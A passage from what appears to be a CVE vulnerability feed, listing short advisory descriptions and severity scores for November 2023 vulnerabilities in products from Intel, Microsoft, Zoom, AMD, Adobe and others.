Link following in Zoom Rooms for macOS before version 5.16.0 may allow an authenticated user to conduct an escalation of privilege via local access.

7.8
2023-11-15 CVE-2023-43591 Zoom Unspecified vulnerability in Zoom Rooms

Improper privilege management in Zoom Rooms for macOS before version 5.16.0 may allow an authenticated user to conduct an escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-39535 AMI Unspecified vulnerability in AMI Aptio V

AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network.

7.8
2023-11-14 CVE-2023-39536 AMI Unspecified vulnerability in AMI Aptio V

AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network.

7.8
2023-11-14 CVE-2023-39537 AMI Unspecified vulnerability in AMI Aptio V

AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network.

7.8
2023-11-14 CVE-2023-46022 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL Injection vulnerability in delete.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'bid' parameter.

7.8
2023-11-14 CVE-2023-46582 Code Projects SQL Injection vulnerability in Code-Projects Inventory Management 1.0

SQL injection vulnerability in Inventory Management v.1.0 allows a local attacker to execute arbitrary SQL commands via the id paramter in the deleteProduct.php component.

7.8
2023-11-14 CVE-2022-27229 Intel Path Traversal vulnerability in Intel Hdmi Firmware

Path transversal in some Intel(R) NUC Kits NUC7i3DN, NUC7i5DN, NUC7i7DN HDMI firmware update tool software before version 1.79.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-33898 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel NUC Watchdog Timer Utility

Insecure inherited permissions in some Intel(R) NUC Watchdog Timer installation software before version 2.0.21.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-38786 Intel Unspecified vulnerability in Intel Battery Life Diagnostic Tool 1.0.7/2.2.0

Improper access control in some Intel Battery Life Diagnostic Tool software before version 2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-41689 Intel Unspecified vulnerability in Intel In-Band Manageability 2.13.0

Improper access control in some Intel In-Band Manageability software before version 3.0.14 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-41700 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel NUC PRO Software Suite 2.0.0.3

Insecure inherited permissions in some Intel(R) NUC Pro Software Suite installation software before version 2.0.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2022-45469 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validation for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-20563 AMD Improper Privilege Management vulnerability in AMD products

Insufficient protections in System Management Mode (SMM) code may allow an attacker to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-20565 AMD Improper Privilege Management vulnerability in AMD products

Insufficient protections in System Management Mode (SMM) code may allow an attacker to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-22292 Intel Improper Handling of Exceptional Conditions vulnerability in Intel Unison Software

Uncaught exception for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-23583 Intel
Debian
Netapp
Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access.
7.8
2023-11-14 CVE-2023-24592 Intel Path Traversal vulnerability in Intel products

Path traversal in the some Intel(R) oneAPI Toolkits and Component software before version 2023.1 may allow authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-25075 Intel Unquoted Search Path or Element vulnerability in Intel Server Configuration Utility 16.0.7/16.0.8

Unquoted search path in the installer for some Intel Server Configuration Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-27305 Intel Incorrect Default Permissions vulnerability in Intel ARC a Graphics and Iris XE Graphics

Incorrect default permissions in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-27513 Intel Uncontrolled Search Path Element vulnerability in Intel Server Information Retrieval Utility

Uncontrolled search path element in some Intel(R) Server Information Retrieval Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-27519 Intel Improper Input Validation vulnerability in Intel products

Improper input validation in firmware for some Intel(R) Optane(TM) SSD products may allow a privileged user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28377 Intel Improper Authentication vulnerability in Intel USB Firmware

Improper authentication in some Intel(R) NUC Kit NUC11PH USB firmware installation software before version 1.1 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28378 Intel Unspecified vulnerability in Intel products

Improper authorization in some Intel(R) QAT drivers for Windows - HW Version 2.0 before version 2.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28388 Intel Uncontrolled Search Path Element vulnerability in Intel Chipset Device Software 10.1.1.45

Uncontrolled search path element in some Intel(R) Chipset Device Software before version 10.1.19444.8378 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28397 Intel Unspecified vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated to potentially enable escalation of privileges via local access.

7.8
2023-11-14 CVE-2023-28401 Intel Out-of-bounds Write vulnerability in Intel ARC a Graphics and Iris XE Graphics

Out-of-bounds write in some Intel(R) Arc(TM) & Iris(R) Xe Graphics - WHQL - Windows drivers before version 31.0.101.4255 may allow authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28737 Intel Improper Initialization vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Improper initialization in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28740 Intel Uncontrolled Search Path Element vulnerability in Intel products

Uncontrolled search path element in some Intel(R) QAT drivers for Windows - HW Version 2.0 before version 2.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-28741 Intel Classic Buffer Overflow vulnerability in Intel products

Buffer overflow in some Intel(R) QAT drivers for Windows - HW Version 1.0 before version 1.10 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-29157 Intel Unspecified vulnerability in Intel ONE Boot Flash Update

Improper access control in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-29161 Intel Uncontrolled Search Path Element vulnerability in Intel ONE Boot Flash Update

Uncontrolled search path in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-29504 Intel Uncontrolled Search Path Element vulnerability in Intel Realsense D400 Series Dynamic Calibration Tool 2.11

Uncontrolled search path element in some Intel(R) RealSense(TM) Dynamic Calibration software before version 2.13.1.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-32204 Intel Unspecified vulnerability in Intel ONE Boot Flash Update

Improper access control in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-32638 Intel Incorrect Default Permissions vulnerability in Intel ARC RGB Controller 1.03

Incorrect default permissions in some Intel Arc RGB Controller software before version 1.06 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-32661 Intel Improper Authentication vulnerability in Intel Realtek SD Card Reader Driver

Improper authentication in some Intel(R) NUC Kits NUC7PJYH and NUC7CJYH Realtek* SD Card Reader Driver installation software before version 10.0.19041.29098 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-33878 Intel Path Traversal vulnerability in Intel Audio Install Package

Path transversal in some Intel(R) NUC P14E Laptop Element Audio Install Package software before version 156 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-34314 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel Simics Simulator

Insecure inherited permissions in some Intel(R) Simics Simulator software before version 1.7.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-34350 Intel Uncontrolled Search Path Element vulnerability in Intel Extreme Tuning Utility 6.4.1.21/6.5.1.360/6.5.3.25

Uncontrolled search path element in some Intel(R) XTU software before version 7.12.0.15 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-34430 Intel Uncontrolled Search Path Element vulnerability in Intel Battery Life Diagnostic Tool 1.0.7/2.2.0

Uncontrolled search path in some Intel Battery Life Diagnostic Tool software before version 2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-34997 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel Server Configuration Utility 16.0.7/16.0.8

Insecure inherited permissions in the installer for some Intel Server Configuration Utility software before version 16.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-38411 Intel Unspecified vulnerability in Intel Smart Campus 6.1

Improper access control in the Intel Smart Campus android application before version 9.4 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-38570 Intel Unspecified vulnerability in Intel Unison Software

Access of memory location after end of buffer for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-39230 Intel Incorrect Permission Assignment for Critical Resource vulnerability in Intel Rapid Storage Technology

Insecure inherited permissions in some Intel Rapid Storage Technology software before version 16.8.5.1014.9 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.8
2023-11-14 CVE-2023-36033 Microsoft Unspecified vulnerability in Microsoft products

Windows DWM Core Library Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36036 Microsoft Unspecified vulnerability in Microsoft products

Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36037 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Excel Security Feature Bypass Vulnerability

7.8
2023-11-14 CVE-2023-36041 Microsoft Use After Free vulnerability in Microsoft products

Microsoft Excel Remote Code Execution Vulnerability

7.8
2023-11-14 CVE-2023-36045 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Office Graphics Remote Code Execution Vulnerability

7.8
2023-11-14 CVE-2023-36047 Microsoft Unspecified vulnerability in Microsoft products

Windows Authentication Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36393 Microsoft Unspecified vulnerability in Microsoft products

Windows User Interface Application Core Remote Code Execution Vulnerability

7.8
2023-11-14 CVE-2023-36396 Microsoft Unspecified vulnerability in Microsoft Windows 11 22H2

Windows Compressed Folder Remote Code Execution Vulnerability

7.8
2023-11-14 CVE-2023-36407 Microsoft Unspecified vulnerability in Microsoft products

Windows Hyper-V Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36408 Microsoft Unspecified vulnerability in Microsoft products

Windows Hyper-V Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36422 Microsoft Unspecified vulnerability in Microsoft Windows Defender 1.1.23060.3001

Microsoft Windows Defender Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36424 Microsoft Unspecified vulnerability in Microsoft products

Windows Common Log File System Driver Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36705 Microsoft Unspecified vulnerability in Microsoft products

Windows Installer Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-36719 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability

7.8
2023-11-14 CVE-2023-41840 Fortinet Untrusted Search Path vulnerability in Fortinet Forticlient 7.0.9/7.2.0/7.2.1

A untrusted search path vulnerability in Fortinet FortiClientWindows 7.0.9 allows an attacker to perform a DLL Hijack attack via a malicious OpenSSL engine library in the search path.

7.8
2023-11-14 CVE-2023-6111 Linux Use After Free vulnerability in Linux Kernel

A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_trans_gc_catchall did not remove the catchall set element from the catchall_list when the argument sync is true, making it possible to free a catchall set element many times. We recommend upgrading past commit 93995bf4af2c5a99e2a87f0cd5ce547d31eb7630.

7.8
2023-11-18 CVE-2023-38361 IBM Use of a Broken or Risky Cryptographic Algorithm vulnerability in IBM Cics TX 10.1

IBM CICS TX Advanced 10.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.

7.5
2023-11-18 CVE-2023-46402 GIT Urls Project Unspecified vulnerability in Git-Urls Project Git-Urls 1.0.1

git-urls 1.0.0 allows ReDOS (Regular Expression Denial of Service) in urls.go.

7.5
2023-11-17 CVE-2023-46745 Librenms Improper Restriction of Excessive Authentication Attempts vulnerability in Librenms

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems.

7.5
2023-11-17 CVE-2023-48238 Joaquimserafim Insufficient Verification of Data Authenticity vulnerability in Joaquimserafim Json web Token

joaquimserafim/json-web-token is a javascript library use to interact with JSON Web Tokens (JWT) which are a compact URL-safe means of representing claims to be transferred between two parties.

7.5
2023-11-17 CVE-2023-48185 Terra Mater Path Traversal vulnerability in Terra-Mater Terra-Master

Directory Traversal vulnerability in TerraMaster v.s1.0 through v.2.295 allows a remote attacker to obtain sensitive information via a crafted GET request.

7.5
2023-11-17 CVE-2023-26347 Adobe Improper Access Control vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass.

7.5
2023-11-17 CVE-2023-22272 Adobe Improper Input Validation vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Input Validation vulnerability that could lead to information disclosure by an unauthenticated attacker.

7.5
2023-11-17 CVE-2023-22274 Adobe XXE vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to information disclosure by an unauthenticated attacker.

7.5
2023-11-17 CVE-2023-22275 Adobe SQL Injection vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could lead to information disclosure by an unauthenticated attacker.

7.5
2023-11-17 CVE-2023-38313 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before 10.1.2.

7.5
2023-11-17 CVE-2023-38315 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

7.5
2023-11-17 CVE-2023-38320 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

7.5
2023-11-17 CVE-2023-38322 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

7.5
2023-11-17 CVE-2023-41102 Opennds Memory Leak vulnerability in Opennds

An issue was discovered in the captive portal in OpenNDS before version 10.1.3.

7.5
2023-11-17 CVE-2023-45382 Common Services Path Traversal vulnerability in Common-Services Sonice Retour

In the module "SoNice Retour" (sonice_retour) up to version 2.1.0 from Common-Services for PrestaShop, a guest can download personal information without restriction by performing a path traversal attack.

7.5
2023-11-16 CVE-2023-6020 RAY Project Missing Authorization vulnerability in RAY Project RAY

LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.

7.5
2023-11-16 CVE-2023-48134 Linecorp Unspecified vulnerability in Linecorp Line 13.6.1

nagayama_copabowl Line 13.6.1 is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor.

7.5
2023-11-16 CVE-2023-48053 Archerydms Use of Hard-coded Credentials vulnerability in Archerydms Archery 1.9.0

Archery v1.10.0 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption.

7.5
2023-11-16 CVE-2023-48055 Superagi Use of Hard-coded Credentials vulnerability in Superagi 0.0.13

SuperAGI v0.0.13 was discovered to use a hardcoded key for encryption operations.

7.5
2023-11-16 CVE-2023-48056 Bandoche Use of Insufficiently Random Values vulnerability in Bandoche Pypinksign 0.5.1

PyPinkSign v0.5.1 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption.

7.5
2023-11-16 CVE-2023-6021 RAY Project Path Traversal vulnerability in RAY Project RAY

LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.

7.5
2023-11-16 CVE-2023-6038 H2O Missing Authorization vulnerability in H2O

A Local File Inclusion (LFI) vulnerability exists in the h2o-3 REST API, allowing unauthenticated remote attackers to read arbitrary files on the server with the permissions of the user running the h2o-3 instance.

7.5
2023-11-16 CVE-2023-6015 Lfprojects Path Traversal vulnerability in Lfprojects Mlflow

MLflow allowed arbitrary files to be PUT onto the server.

7.5
2023-11-16 CVE-2023-6023 Vertaai Path Traversal vulnerability in Vertaai Modeldb

An attacker can read any file on the filesystem on the server hosting ModelDB through an LFI in the artifact_path URL parameter.

7.5
2023-11-16 CVE-2023-26031 Apache Untrusted Search Path vulnerability in Apache Hadoop 3.3.1/3.3.2/3.3.4

Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges.

7.5
2023-11-16 CVE-2023-47263 Withsecure Unspecified vulnerability in Withsecure products

Certain WithSecure products allow a Denial of Service (DoS) in the antivirus engine when scanning a fuzzed PE32 file.

7.5
2023-11-16 CVE-2023-47264 Withsecure Out-of-bounds Read vulnerability in Withsecure products

Certain WithSecure products have a buffer over-read whereby processing certain fuzz file types may cause a denial of service (DoS).

7.5
2023-11-15 CVE-2023-47345 Free5Gc Classic Buffer Overflow vulnerability in Free5Gc 3.3.0

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.

7.5
2023-11-15 CVE-2023-47347 Free5Gc Classic Buffer Overflow vulnerability in Free5Gc 3.3.0

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes.

7.5
2023-11-15 CVE-2023-5720 Quarkus Unspecified vulnerability in Quarkus

A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain.

7.5
2023-11-15 CVE-2023-34062 Pivotal Path Traversal vulnerability in Pivotal Reactor Netty 1.0.11/1.0.23

In Reactor Netty HTTP Server, versions 1.1.x prior to 1.1.13 and versions 1.0.x prior to 1.0.39, a malicious user can send a request using a specially crafted URL that can lead to a directory traversal attack. Specifically, an application is vulnerable if Reactor Netty HTTP Server is configured to serve static resources.

7.5
2023-11-14 CVE-2023-39203 Zoom Unspecified vulnerability in Zoom Virtual Desktop Infrastructure and Zoom

Uncontrolled resource consumption in Zoom Team Chat for Zoom Desktop Client for Windows and Zoom VDI Client may allow an unauthenticated user to conduct a disclosure of information via network access.

7.5
2023-11-14 CVE-2023-39204 Zoom Classic Buffer Overflow vulnerability in Zoom products

Buffer overflow in some Zoom clients may allow an unauthenticated user to conduct a denial of service via network access.

7.5
2023-11-14 CVE-2023-39206 Zoom Classic Buffer Overflow vulnerability in Zoom products

Buffer overflow in some Zoom clients may allow an unauthenticated user to conduct a denial of service via network access.

7.5
2023-11-14 CVE-2023-45620 Arubanetworks
HP
Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol.
7.5
2023-11-14 CVE-2023-45621 Arubanetworks
HP
Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the CLI service accessed via the PAPI protocol.
7.5
2023-11-14 CVE-2023-45622 Arubanetworks
HP
Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the BLE daemon service accessed via the PAPI protocol.
7.5
2023-11-14 CVE-2023-45623 Arubanetworks
HP
Unauthenticated Denial-of-Service (DoS) vulnerabilities exist in the Wi-Fi Uplink service accessed via the PAPI protocol.
7.5
2023-11-14 CVE-2023-45624 Arubanetworks
HP
An unauthenticated Denial-of-Service (DoS) vulnerability exists in the soft ap daemon accessed via the PAPI protocol.
7.5
2023-11-14 CVE-2023-36038 Microsoft Unspecified vulnerability in Microsoft Asp.Net Core and Visual Studio 2022

ASP.NET Core Denial of Service Vulnerability

7.5
2023-11-14 CVE-2023-46024 Phpgurukul SQL Injection vulnerability in PHPgurukul Teacher Subject Allocation Management System 1.0

SQL Injection vulnerability in index.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to run arbitrary SQL commands and obtain sensitive information via the 'searchdata' parameter.

7.5
2023-11-14 CVE-2023-47627 Aiohttp HTTP Request Smuggling vulnerability in Aiohttp

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python.

7.5
2023-11-14 CVE-2021-46774 AMD Unspecified vulnerability in AMD products

Insufficient DRAM address validation in System Management Unit (SMU) may allow an attacker to read/write from/to an invalid DRAM address, potentially resulting in denial-of-service.

7.5
2023-11-14 CVE-2023-20533 AMD Unspecified vulnerability in AMD products

Insufficient DRAM address validation in System Management Unit (SMU) may allow an attacker to read/write from/to an invalid DRAM address, potentially resulting in denial-of-service.

7.5
2023-11-14 CVE-2023-20566 AMD Unspecified vulnerability in AMD products

Improper address validation in ASP with SNP enabled may potentially allow an attacker to compromise guest memory integrity.

7.5
2023-11-14 CVE-2023-22285 Intel Unspecified vulnerability in Intel Unison Software

Improper access control for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access.

7.5
2023-11-14 CVE-2023-22337 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validation for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access.

7.5
2023-11-14 CVE-2023-31203 Intel Unspecified vulnerability in Intel Openvino Model Server

Improper input validation in some OpenVINO Model Server software before version 2022.3 for Intel Distribution of OpenVINO toolkit may allow an unauthenticated user to potentially enable denial of service via network access.

7.5
2023-11-14 CVE-2023-31320 AMD Improper Input Validation vulnerability in AMD products

Improper input validation in the AMD RadeonTM Graphics display driver may allow an attacker to corrupt the display potentially resulting in denial of service.

7.5
2023-11-14 CVE-2023-32279 Intel Unspecified vulnerability in Intel Connectivity Performance Suite

Improper access control in user mode driver for some Intel(R) Connectivity Performance Suite before version 2.1123.214.2 may allow unauthenticated user to potentially enable information disclosure via network access.

7.5
2023-11-14 CVE-2023-39228 Intel Unspecified vulnerability in Intel Unison Software

Improper access control for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access.

7.5
2023-11-14 CVE-2023-36392 Microsoft Unspecified vulnerability in Microsoft products

DHCP Server Service Denial of Service Vulnerability

7.5
2023-11-14 CVE-2023-36395 Microsoft Unspecified vulnerability in Microsoft products

Windows Deployment Services Denial of Service Vulnerability

7.5
2023-11-14 CVE-2023-42783 Fortinet Relative Path Traversal vulnerability in Fortinet Fortiwlm

A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.2 through 8.4.0 and 8.3.2 through 8.3.0 and 8.2.2 allows attacker to read arbitrary files via crafted http requests.

7.5
2023-11-14 CVE-2023-45684 Northern Tech SQL Injection vulnerability in Northern.Tech Cfengine

Northern.tech CFEngine Enterprise before 3.21.3 allows SQL Injection.

7.5
2023-11-14 CVE-2023-43503 Siemens Cleartext Transmission of Sensitive Information vulnerability in Siemens Comos

A vulnerability has been identified in COMOS (All versions < V10.4.4).

7.5
2023-11-14 CVE-2023-46590 Siemens XXE vulnerability in Siemens OPC UA Modeling Editor

A vulnerability has been identified in Siemens OPC UA Modelling Editor (SiOME) (All versions < V2.8).

7.5
2023-11-14 CVE-2023-46601 Siemens Improper Access Control vulnerability in Siemens Comos

A vulnerability has been identified in COMOS (All versions).

7.5
2023-11-14 CVE-2023-45558 Golden Project Unspecified vulnerability in Golden Project Golden 13.6.1

An issue in Golden v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.

7.5
2023-11-14 CVE-2023-45560 Memberscard Project Unspecified vulnerability in Memberscard Project Memberscard 13.6.1

An issue in Yasukawa memberscard v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.

7.5
2023-11-13 CVE-2023-47346 Free5Gc Classic Buffer Overflow vulnerability in Free5Gc Free5Gc, SMF and UPF

Buffer Overflow vulnerability in free5gc 3.3.0, UPF 1.2.0, and SMF 1.2.0 allows attackers to cause a denial of service via crafted PFCP messages.

7.5
2023-11-13 CVE-2023-47117 Humansignal Unspecified vulnerability in Humansignal Label Studio

Label Studio is an open source data labeling tool.

7.5
2023-11-13 CVE-2023-6101 Maiwei Safety Production Control Platform Project Unspecified vulnerability in Maiwei Safety Production Control Platform Project Maiwei Safety Production Control Platform 4.1

A vulnerability, which was classified as problematic, has been found in Maiwei Safety Production Control Platform 4.1.

7.5
2023-11-13 CVE-2022-45835 Phonepe Server-Side Request Forgery (SSRF) vulnerability in Phonepe

Server-Side Request Forgery (SSRF) vulnerability in PhonePe PhonePe Payment Solutions.This issue affects PhonePe Payment Solutions: from n/a through 1.0.15.

7.5
2023-11-13 CVE-2023-34013 AYS PRO Server-Side Request Forgery (SSRF) vulnerability in Ays-Pro Poll Maker

Server-Side Request Forgery (SSRF) vulnerability in Poll Maker Team Poll Maker – Best WordPress Poll Plugin.This issue affects Poll Maker – Best WordPress Poll Plugin: from n/a through 4.6.2.

7.5
2023-11-13 CVE-2023-46207 Stylemixthemes Server-Side Request Forgery (SSRF) vulnerability in Stylemixthemes Motors - CAR Dealer, Classifieds & Listing

Server-Side Request Forgery (SSRF) vulnerability in StylemixThemes Motors – Car Dealer, Classifieds & Listing.This issue affects Motors – Car Dealer, Classifieds & Listing: from n/a through 1.4.6.

7.5
2023-11-13 CVE-2023-47163 Remarshal Project Uncontrolled Recursion vulnerability in Remarshal Project Remarshal

Remarshal prior to v0.17.1 expands YAML alias nodes unlimitedly, hence Remarshal is vulnerable to Billion Laughs Attack.

7.5
2023-11-16 CVE-2023-48052 Httpie Improper Certificate Validation vulnerability in Httpie 3.2.2

Missing SSL certificate validation in HTTPie v3.2.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.

7.4
2023-11-16 CVE-2023-48054 Localstack Improper Certificate Validation vulnerability in Localstack 2.3.2

Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.

7.4
2023-11-16 CVE-2023-39246 Dell Link Following vulnerability in Dell products

Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server version prior to 11.8.1 contain an Insecure Operation on Windows Junction Vulnerability during installation.

7.3
2023-11-14 CVE-2023-29165 Intel Unquoted Search Path or Element vulnerability in Intel ARC a Graphics and Iris XE Graphics

Unquoted search path or element in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-32278 Intel Path Traversal vulnerability in Intel NUC Uniwill Service Driver

Path transversal in some Intel(R) NUC Uniwill Service Driver for Intel(R) NUC M15 Laptop Kits - LAPRC510 & LAPRC710 Uniwill Service Driver installation software before version 1.0.1.7 for Intel(R) NUC Software Studio may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-32655 Intel Path Traversal vulnerability in Intel USB Type C Power Delivery Controller

Path transversal in some Intel(R) NUC Kits & Mini PCs - NUC8i7HVK & NUC8HNK USB Type C power delivery controller installatio software before version 1.0.10.3 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-32658 Intel Unquoted Search Path or Element vulnerability in Intel Hdmi Firmware

Unquoted search path in some Intel(R) NUC Kits NUC7i3DN, NUC7i5DN, NUC7i7DN HDMI firmware update tool software before version 1.79.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-32660 Intel Uncontrolled Search Path Element vulnerability in Intel Thunderbolt 3 Controller Firmware 27/38

Uncontrolled search path in some Intel(R) NUC Kit NUC6i7KYK Thunderbolt(TM) 3 Firmware Update Tool installation software before version 46 may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-33874 Intel Uncontrolled Search Path Element vulnerability in Intel HID Event Filter Driver

Uncontrolled search path in some Intel(R) NUC 12 Pro Kits & Mini PCs - NUC12WS Intel(R) HID Event Filter Driver installation software before version 2.2.2.1 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.

7.3
2023-11-14 CVE-2023-45582 Fortinet Improper Restriction of Excessive Authentication Attempts vulnerability in Fortinet Fortimail

An improper restriction of excessive authentication attempts vulnerability [CWE-307] in FortiMail webmail version 7.2.0 through 7.2.4, 7.0.0 through 7.0.6 and before 6.4.8 may allow an unauthenticated attacker to  perform a brute force attack on the affected endpoints via repeated login attempts.

7.3
2023-11-17 CVE-2023-22273 Adobe Path Traversal vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to Remote Code Execution by an admin authenticated attacker.

7.2
2023-11-17 CVE-2023-47675 Cubecart OS Command Injection vulnerability in Cubecart

